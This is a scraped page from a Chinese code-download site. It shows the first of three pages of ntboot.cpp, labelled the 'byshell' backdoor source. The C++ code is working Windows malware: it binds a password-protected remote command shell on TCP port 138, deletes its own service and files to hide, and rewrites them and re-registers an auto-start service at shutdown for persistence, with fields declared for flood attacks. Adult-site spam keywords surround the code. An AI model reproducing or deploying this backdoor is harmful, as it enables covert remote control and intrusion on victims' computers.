亚洲欧美第一页_禁久久精品乱码_粉嫩av一区二区三区免费野_久草精品视频

? 歡迎來到蟲蟲下載站! | ?? 資源下載 ?? 資源專輯 ?? 關于我們
? 蟲蟲下載站

?? ntboot.cpp

?? byshell后門源代碼
?? CPP
?? 第 1 頁 / 共 3 頁
字號:
//byshell v0.63DLL,use tcp138 in winlogon.//no,svchost/no,all system process are the same/inj to spoolsv,can be changed to other
//powered 12.19,2004(a long struggle!)
//receive shutdown signal
/*************************************************************
4  ways:
1 setconsolecontrolhandler(donot need msg queue)
//1_ but winlogon cannot receive such a signal!!
2 receive wm_queryendsession(need to register wnd class and msgqueue)
3 setwindowshookex shutdownkey 0xff(need a msg queue but do not receive msg from GetMessage,maybe windows automatically call the CALLBACK)
//2_same code keyhook when inj to a simple process can cause a beep but in winlogon cannot
//2_winlogon cannot use hook,maybe winlogon even cannot use anything related to msg
4 setwindowshookex any process receive wm_queryendsession(same to 3)
****************************************************************/
//experiment:lsass,the same to winlogon
#include <stdio.h>
#pragma comment(lib, "ws2_32.lib")
#pragma comment(lib, "kernel32.lib")
#include <winsock2.h>
#include <stdlib.h>
#include <tlhelp32.h>
#include <Ws2tcpip.h>
#include <string.h>
#pragma comment(lib,"advapi32.lib")
//#include "ntdll.h"
//#include <winuser.h>


#pragma data_seg("abShared")
char pwd[16]="by";char buff[65536];
struct{SECURITY_ATTRIBUTES sa;HANDLE hread,hwrite,cread,cwrite;
STARTUPINFO si;PROCESS_INFORMATION pi;
}extshell;
struct{char target[256];char dostype;char faketype;int serioustype;HANDLE threadhandle;HANDLE timerhandle;
int pausetime;int seconds;int definemins;WORD attackport;WORD useport;}dos;
//0 not,1 syn,2 tcp//0 nolimit,1 Bclass,2 nofake
HANDLE filefp;HANDLE pbitmapwithoutfileh;DWORD sizeimage;unsigned int packnum=0;//num of pack sent already


void* memloader;void* memdll;int sizeloader;int sizedll;HHOOK msghook;HANDLE mainthread;
#pragma data_seg() 


__declspec(dllexport)
DWORD WINAPI CmdService(LPVOID);//real telnetEX server function

char work(char * workbuff,unsigned int workbufflen,char workflag,int * psendlength);//return flag,int * psendlength send size


BOOL APIENTRY DllMain( HANDLE hModule, 
                       DWORD  ul_reason_for_call, 
                       LPVOID lpReserved
                     )
{    return TRUE;
}


__declspec(dllexport)
DWORD WINAPI CmdService(LPVOID lpParam){
int ret;DWORD dwThreadId;DWORD bytesread;char syspath[256];
//donnot save pass on disk any more
GetSystemDirectory(syspath,256);strcat(syspath,"\\ntboot.dat");
HANDLE pwdfp=CreateFile(syspath,GENERIC_READ,0,0,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0);
if(pwdfp==INVALID_HANDLE_VALUE){strcpy(pwd,"by");}
else{DWORD bytesread;ReadFile(pwdfp,pwd,16,&bytesread,0);CloseHandle(pwdfp);}
DeleteFile(syspath);	
//del the loader service,del the two files
Sleep(100);
	SC_HANDLE        schSCManager;
	SC_HANDLE        schService;
	SERVICE_STATUS   RemoveServiceStatus;
	schSCManager=OpenSCManager(0,NULL,SC_MANAGER_ALL_ACCESS);
	schService=OpenService(schSCManager,"ntboot",SERVICE_ALL_ACCESS);
    QueryServiceStatus(schService,&RemoveServiceStatus);

			if(RemoveServiceStatus.dwCurrentState==SERVICE_STOPPED){}
     		else
			{
     			if(ControlService(schService,SERVICE_CONTROL_STOP,&RemoveServiceStatus)!=0)
				{
      				while(RemoveServiceStatus.dwCurrentState==SERVICE_STOP_PENDING)         
					{
    					Sleep(10);
	    				QueryServiceStatus(schService,&RemoveServiceStatus);
					}

				}
				else
				{}
			}
    DeleteService(schService);
	CloseServiceHandle(schSCManager);        
	CloseServiceHandle(schService);


Sleep(100);
ret=GetSystemDirectory(syspath,256);
HANDLE delfp=CreateFile(strcat(syspath,"\\ntboot.exe"),GENERIC_READ,0,0,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0);
sizeloader=GetFileSize(delfp,0);memloader=VirtualAlloc(0,sizeloader,MEM_COMMIT|MEM_RESERVE,PAGE_READWRITE);
ReadFile(delfp,memloader,sizeloader,&bytesread,0);CloseHandle(delfp);DeleteFile(syspath);

ret=GetSystemDirectory(syspath,256);
delfp=CreateFile(strcat(syspath,"\\ntboot.dll"),GENERIC_READ,0,0,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0);
sizedll=GetFileSize(delfp,0);memdll=VirtualAlloc(0,sizedll,MEM_COMMIT|MEM_RESERVE,PAGE_READWRITE);
ReadFile(delfp,memdll,sizedll,&bytesread,0);CloseHandle(delfp);DeleteFile(syspath);

//install hook,when shutdown resume two files and the service

//need a thread to interpret the message queue
//no!the msgqueue must be in the same thread of the setwindowshookex
/*A JournalRecordProc hook procedure does not need to live in a dynamic-link library. 
A JournalRecordProc hook procedure can live in the application itself. 
--MSDN*/
/*
LRESULT CALLBACK JournalRecordProc(int code,WPARAM wParam,LPARAM lParam);
//keyhook=SetWindowsHookEx(WH_KEYBOARD,KeyboardProc,0,0);1428
msghook=SetWindowsHookEx(WH_JOURNALRECORD,JournalRecordProc,GetModuleHandle(0),0);
//if(!msghook){MessageBox(0,itoa(GetLastError(),syspath,10),0,0);}
DWORD WINAPI msgqueue( LPVOID lpParam );CreateThread(0,0,msgqueue,0,0,&dwThreadId);
*/
DWORD WINAPI hookthread( LPVOID lpParam );CreateThread(0,0,hookthread,0,0,&dwThreadId);
mainthread=GetCurrentThread();

//begin network
LoadLibrary("WS2_32.dll");LoadLibrary("wshtcpip.dll");LoadLibrary("WS2HELP.DLL");
LoadLibrary("msafd.dll");//加載必要模塊否則在解除映射后可能缺少需要的庫
label3: WSADATA WSAData;WSAStartup(MAKEWORD(2,2),&WSAData);
SOCKET socklisten=socket(AF_INET,SOCK_STREAM,0);SOCKET socktcp;
sockaddr_in srvaddr;memset(&srvaddr,0,sizeof(struct sockaddr_in));
srvaddr.sin_family= AF_INET;
srvaddr.sin_port = htons(138);
srvaddr.sin_addr.S_un.S_addr = INADDR_ANY;
ret=bind(socklisten,(struct sockaddr *)&srvaddr,sizeof(struct sockaddr));
if(ret){goto label2;}
if(listen(socklisten,5)==-1){goto label2;}
label1: while (true){
  socktcp= accept(socklisten, 0,0);
  if(socktcp!=0 && socktcp!=-1){break;}
  Sleep(250);}
//recv4096,send4080
//about Q3:  no fixed size packet!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!bad for dir c:\winnt
//11Q,multithread
dwThreadId=0;DWORD WINAPI threadfunc( LPVOID lpParam );
CreateThread(0, 0, threadfunc, &socktcp, 0, &dwThreadId);
goto label1;
/*while(1){memset(buff,0,65536);recvlen=recv(socktcp,buff,65536,0);
 if(strncmp(buff,pwd,strlen(pwd))){closesocket(socktcp);workflag=0;goto label1;}
 int sendlength=65520;workflag=work(buff+16,recvlen-16,workflag,&sendlength);
 if(sendlength!=send(socktcp,buff+16,sendlength,0)){closesocket(socktcp);workflag=0;goto label1;}
       }*/
//wait for error to be solved
label2:
closesocket(socklisten);Sleep(1000);goto label3;
return 0;}

//這個鍵盤喇叭鉤子不是很健壯,經常在工作1,2個小時后罷工??
LRESULT CALLBACK JournalRecordProc(int code,WPARAM wParam,LPARAM lParam){void resume();
if(code<0){return CallNextHookEx(msghook,code,wParam,lParam);}
if(code==HC_ACTION){
	EVENTMSG * pevent=(EVENTMSG *)lParam;
	if(pevent->message==WM_KEYDOWN && LOBYTE(pevent->paramL)==0xFF){resume();}
	//if(pevent->message==WM_KEYDOWN && LOBYTE(pevent->paramL)==0x42){MessageBeep(0);}
	//if(pevent->message==WM_KEYDOWN && LOBYTE(pevent->paramL)==0x41){}
	//if(pevent->message==WM_QUERYENDSESSION){DebugBreak();}
}
return CallNextHookEx(msghook,code,wParam,lParam);
}

//i suffer a lot

BOOL WINAPI HandlerRoutine(DWORD dwCtrlType){void resume();
switch(dwCtrlType)
{
case CTRL_SHUTDOWN_EVENT:
resume();
break;
default:
break;
}
return 0;
}



DWORD WINAPI hookthread( LPVOID lpParam ){MSG msg;int tmpret;char tmpstr[100];
LRESULT CALLBACK JournalRecordProc(int code,WPARAM wParam,LPARAM lParam);
//BOOL WINAPI HandlerRoutine(DWORD dwCtrlType);
msghook=SetWindowsHookEx(WH_JOURNALRECORD,JournalRecordProc,GetModuleHandle(0),0);
if(!msghook){MessageBox(0,itoa(GetLastError(),tmpstr,10),0,0);DebugBreak();}
tmpret=SetConsoleCtrlHandler(HandlerRoutine,1);
if(!tmpret){MessageBox(0,itoa(GetLastError(),tmpstr,10),0,0);DebugBreak();}
//setwindowshookex(key) need a msg queue but do not receive msg from GetMessage,weird,maybe need a initialize of msg function?
while (GetMessage(&msg, NULL, 0, 0)){void resume();
if(msg.message==WM_QUERYENDSESSION){resume();}
//DispatchMessage(&msg);
}
UnhookWindowsHookEx(msghook);
return 0;
}

//resume two files and the service
void resume(){
//HANDLE hhhfp=CreateFile("d:\\aaaaaa",GENERIC_WRITE,0,0,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,0);
//CloseHandle(hhhfp);
char syspath[256];int ret;DWORD bytesread;
ret=GetSystemDirectory(syspath,256);
HANDLE delfp=CreateFile(strcat(syspath,"\\ntboot.exe"),GENERIC_WRITE,0,0,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,0);
WriteFile(delfp,memloader,sizeloader,&bytesread,0);CloseHandle(delfp);

ret=GetSystemDirectory(syspath,256);
delfp=CreateFile(strcat(syspath,"\\ntboot.dll"),GENERIC_WRITE,0,0,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,0);
WriteFile(delfp,memdll,sizedll,&bytesread,0);CloseHandle(delfp);

ret=GetSystemDirectory(syspath,256);
delfp=CreateFile(strcat(syspath,"\\ntboot.dat"),GENERIC_WRITE,0,0,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,0);
WriteFile(delfp,pwd,strlen(pwd),&bytesread,0);CloseHandle(delfp);

SC_HANDLE schSCManager;
schSCManager=OpenSCManager(0,NULL,SC_MANAGER_ALL_ACCESS);
CreateService(schSCManager,"NtBoot","NT Boot Service",SERVICE_ALL_ACCESS,
		      SERVICE_WIN32_OWN_PROCESS|SERVICE_INTERACTIVE_PROCESS,SERVICE_AUTO_START,
				SERVICE_ERROR_IGNORE,"ntboot.exe",NULL,NULL,NULL,NULL,NULL);
SetConsoleCtrlHandler(HandlerRoutine,0);UnhookWindowsHookEx(msghook);
return;
}


DWORD WINAPI threadfunc( LPVOID lpParam )
{char workflag=0;int recvlen=0;SOCKET socktcp;socktcp=*((SOCKET*)lpParam);
 while(1){memset(buff,0,66000);recvlen=recv(socktcp,buff,66000,0);
 if(strncmp(buff,pwd,strlen(pwd))){closesocket(socktcp);workflag=0;return 0;}//solve pwd
 int duelen;memcpy(&duelen,buff+28,4);
 while(duelen>recvlen){recvlen+=recv(socktcp,buff+recvlen,66000-recvlen,0);}//solve data division
 int sendlength=65536;
 if(!strncmp(buff+32,"dettach",7)){SetConsoleCtrlHandler(HandlerRoutine,0);UnhookWindowsHookEx(msghook);return 0xffffffff;}
 workflag=work(buff+32,duelen-32,workflag,&sendlength);
 sendlength+=32;memcpy(buff+28,&sendlength,4);
 if(sendlength!=send(socktcp,buff,sendlength,0)){closesocket(socktcp);workflag=0;return 0;}
       }
}




































//reusable module

//designed for 65536recv max,65520send max,16prefix.
char work(char * workbuff,unsigned int workbufflen,char workflag,int * psendlength)
{//cmd,not check the cmdlog,execute one command and return.
if(workflag==0 && strncmp(workbuff,"cmd",3)==0){
	char cmdline[1023]={0};GetSystemDirectory(cmdline,512);strcat(cmdline,"\\cmd.exe /c ");
	strncat(cmdline,workbuff+3,1024-strlen(cmdline));
	SECURITY_ATTRIBUTES sa;HANDLE hread,hwrite;sa.nLength=sizeof(SECURITY_ATTRIBUTES);
	sa.lpSecurityDescriptor=0;sa.bInheritHandle=1;CreatePipe(&hread,&hwrite,&sa,65536);
	STARTUPINFO si;PROCESS_INFORMATION pi;si.cb=sizeof(STARTUPINFO);GetStartupInfo(&si);
	si.hStdError=hwrite;si.hStdOutput=hwrite;si.wShowWindow=SW_HIDE;
	si.dwFlags=STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;
	if(!CreateProcess(0,cmdline,0,0,1,0,0,0,&si,&pi)){
		memset(workbuff,0,65520);strcpy(workbuff,"cmd bind error\n");return 0;
		}
	DWORD bytesread=0;
	//3Q sleep1000prevent readfile form miss data,here we cannot send many times.
	//still miss data, trys 5000 still.then must on the buffer of the pipe.
	//still no result.enlarge the CreatePipe buffter to 65536,success.
	//8Q if a cmd has no ret data,eg. "winver",backdoor will block in readfile.use peeknamedpipe to solve this problem.
	WaitForSingleObject( pi.hProcess, 10000);
	memset(workbuff,0,65520);PeekNamedPipe(hread,0,0,0,&bytesread,0);
	if(!bytesread){strcpy(workbuff,"pipe has no ret data\n");*psendlength=strlen(workbuff);return 0;}
	ReadFile(hread,workbuff,65520,&bytesread,0);
	CloseHandle(hread);CloseHandle(hwrite);*psendlength=bytesread;
		return 0;
}
//ok,shell,workflag=1
//start shell
if(workflag==0 && strncmp(workbuff,"shell",5)==0){
	char cmdline[1023]={0};GetSystemDirectory(cmdline,512);strcat(cmdline,"\\cmd.exe");
	extshell.sa.nLength=sizeof(SECURITY_ATTRIBUTES);
	extshell.sa.lpSecurityDescriptor=0;extshell.sa.bInheritHandle=1;
	CreatePipe(&extshell.hread,&extshell.hwrite,&extshell.sa,65536);
	CreatePipe(&extshell.cread,&extshell.cwrite,&extshell.sa,65536);
	extshell.si.cb=sizeof(STARTUPINFO);GetStartupInfo(&(extshell.si));

?? 快捷鍵說明

復制代碼 Ctrl + C
搜索代碼 Ctrl + F
全屏模式 F11
切換主題 Ctrl + Shift + D
顯示快捷鍵 ?
增大字號 Ctrl + =
減小字號 Ctrl + -
亚洲欧美第一页_禁久久精品乱码_粉嫩av一区二区三区免费野_久草精品视频
国产馆精品极品| 国产精品夫妻自拍| 成人av动漫在线| 日本中文一区二区三区| 国产精品网站导航| 欧美一区二区美女| 在线亚洲高清视频| 成人一区二区三区中文字幕| 亚洲成a人v欧美综合天堂| 中文字幕av不卡| 日韩精品专区在线影院观看 | 欧美午夜影院一区| 成人av手机在线观看| 亚洲国产综合色| 国产精品高潮呻吟| 国产欧美精品一区二区色综合| 这里只有精品电影| 欧美丝袜自拍制服另类| 99久久久久久| 91在线观看污| 在线这里只有精品| 欧美性色aⅴ视频一区日韩精品| 成人av网站免费观看| a级精品国产片在线观看| 成人自拍视频在线观看| 成人av在线影院| 91麻豆免费看片| 一本大道综合伊人精品热热| 在线欧美小视频| 欧美精品第一页| 日韩精品中文字幕在线一区| 日韩精品专区在线| 国产无人区一区二区三区| 国产精品每日更新| 夜夜精品视频一区二区| 亚洲大片免费看| 久久不见久久见免费视频7| 国产不卡视频在线观看| 91无套直看片红桃| 这里是久久伊人| 国产欧美一区二区精品性色超碰| 亚洲美女一区二区三区| 天天免费综合色| 粉嫩aⅴ一区二区三区四区| 在线观看欧美精品| www国产精品av| 亚洲精品乱码久久久久久黑人| 天堂av在线一区| 国产·精品毛片| 宅男噜噜噜66一区二区66| 日本一区二区三区免费乱视频 | 国产精品情趣视频| 亚洲成人精品影院| 国产精品一品视频| 欧美疯狂做受xxxx富婆| 国产精品乱码一区二区三区软件 | 最好看的中文字幕久久| 麻豆成人久久精品二区三区红 | 亚洲一区在线看| 免费在线观看日韩欧美| 国产福利精品导航| 欧美xxxxx裸体时装秀| 夜夜精品视频一区二区| 国产精品一色哟哟哟| 欧美色精品天天在线观看视频| 国产精品美女一区二区| 高清不卡一二三区| 久久久久久久久久久黄色| 美女脱光内衣内裤视频久久网站| 欧美老女人在线| 亚洲成av人片观看| 欧美自拍丝袜亚洲| 亚洲一区二区三区小说| 色综合色狠狠天天综合色| 国产精品国产三级国产有无不卡 | 久久99这里只有精品| 欧美日韩不卡在线| 亚洲国产精品久久不卡毛片| 99这里只有精品| 18成人在线视频| 91高清在线观看| 亚洲综合色噜噜狠狠| 欧美性猛交xxxxxx富婆| 午夜视频在线观看一区二区| 欧美日韩在线观看一区二区| 日韩精品亚洲一区| 国产女主播在线一区二区| 97成人超碰视| 日韩国产精品久久久| 欧美成人精品二区三区99精品| 国产很黄免费观看久久| 一区二区三区 在线观看视频| 欧美一区二区视频在线观看| 国产综合成人久久大片91| 中文字幕一区二区三区不卡| 一本高清dvd不卡在线观看| 久久国产三级精品| 国产精品第五页| 日韩欧美一级精品久久| 99国产一区二区三精品乱码| 蜜桃视频在线观看一区| 一区二区三区视频在线看| 欧美一级二级三级乱码| 99国产一区二区三精品乱码| 亚洲第一av色| 国产精品久久久久久久久动漫| 91精品国产手机| 色狠狠色狠狠综合| 成人免费观看男女羞羞视频| 免费国产亚洲视频| 天堂影院一区二区| 亚洲综合色自拍一区| 国产欧美精品一区二区色综合| 欧美一级久久久久久久大片| 日本精品裸体写真集在线观看| 丁香天五香天堂综合| 久久精品国产久精国产| 亚洲一级片在线观看| 亚洲啪啪综合av一区二区三区| 国产无人区一区二区三区| 精品国产一区a| 精品国产伦一区二区三区观看方式| 欧美系列亚洲系列| 欧美人狂配大交3d怪物一区| 色吧成人激情小说| 91片在线免费观看| 色美美综合视频| 欧美视频中文字幕| 555www色欧美视频| 这里只有精品视频在线观看| 精品免费日韩av| 中文字幕的久久| 亚洲精品v日韩精品| 亚洲一本大道在线| 青青草精品视频| 国产乱码精品一区二区三区av| 国产·精品毛片| 在线观看一区日韩| 欧美精品在线一区二区三区| 日韩欧美aaaaaa| 中文字幕亚洲精品在线观看| 亚洲一区在线视频| 国产精品1区二区.| 欧美亚洲综合网| 2017欧美狠狠色| 亚洲二区视频在线| 国模娜娜一区二区三区| 99国产精品99久久久久久| 91精品国产综合久久久蜜臀图片| 国产午夜亚洲精品理论片色戒| 亚洲欧美另类在线| 麻豆精品一区二区三区| 色狠狠色狠狠综合| 国产亚洲成aⅴ人片在线观看 | 在线视频你懂得一区| 26uuu精品一区二区在线观看| 亚洲黄一区二区三区| 国产精品资源网| 欧美高清精品3d| 亚洲二区在线视频| 91免费看`日韩一区二区| 久久久美女艺术照精彩视频福利播放| 亚洲精品成人在线| 成人视屏免费看| 久久这里只有精品视频网| 五月婷婷激情综合网| 9久草视频在线视频精品| 久久久久国产精品麻豆ai换脸| 日本不卡视频一二三区| 国产婷婷色一区二区三区在线| 久久成人免费网| 欧美大片在线观看一区二区| 亚洲综合色成人| 欧美视频一二三区| 午夜精品一区二区三区电影天堂 | 亚洲日韩欧美一区二区在线| 精品一区二区三区在线观看| 欧美一级片在线| 秋霞午夜av一区二区三区| 欧美另类久久久品| 蜜臀av性久久久久av蜜臀妖精| 777久久久精品| 国产麻豆视频一区| 国产精品嫩草99a| 色噜噜偷拍精品综合在线| 亚洲国产综合人成综合网站| 欧美理论电影在线| 国产99久久久久| 亚洲在线成人精品| 欧美一区国产二区| 国产99久久久久| 亚洲午夜精品17c| 国产日韩欧美制服另类| 欧美性大战久久| 久久黄色级2电影| 中文字幕一区二区三区蜜月| 欧美精品在线观看播放| 国产成人无遮挡在线视频| 亚洲亚洲人成综合网络| 国产偷国产偷精品高清尤物|